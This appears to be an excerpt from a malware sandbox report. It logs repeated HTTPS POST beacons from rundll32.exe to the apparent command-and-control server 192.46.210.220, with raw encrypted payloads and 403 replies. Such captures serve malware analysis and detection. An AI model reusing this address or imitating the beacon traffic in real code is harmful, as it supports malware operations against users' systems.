                                                                                                        2021-10-28 02:46:12 UTC164OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:13 UTC173INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.549897192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:12 UTC168OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:12 UTC169OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:13 UTC173INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.549905192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:16 UTC174OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:16 UTC174OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:17 UTC183INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.549904192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:16 UTC178OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:16 UTC178OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:17 UTC183INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.549912192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:20 UTC183OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:20 UTC184OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:20 UTC193INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.549913192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:20 UTC188OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:20 UTC188OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:20 UTC193INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.549920192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:24 UTC193OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:24 UTC194OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:24 UTC203INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.549769192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:11 UTC19OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:11 UTC19OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:12 UTC24INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.549921192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:24 UTC198OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:24 UTC198OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:25 UTC203INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.549940192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:28 UTC203OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:28 UTC203OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:28 UTC213INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.549941192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:28 UTC208OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:28 UTC208OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:28 UTC213INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.549963192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:31 UTC213OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:31 UTC213OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:32 UTC223INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.549964192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:31 UTC218OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:31 UTC218OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:32 UTC223INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.549974192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:35 UTC223OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
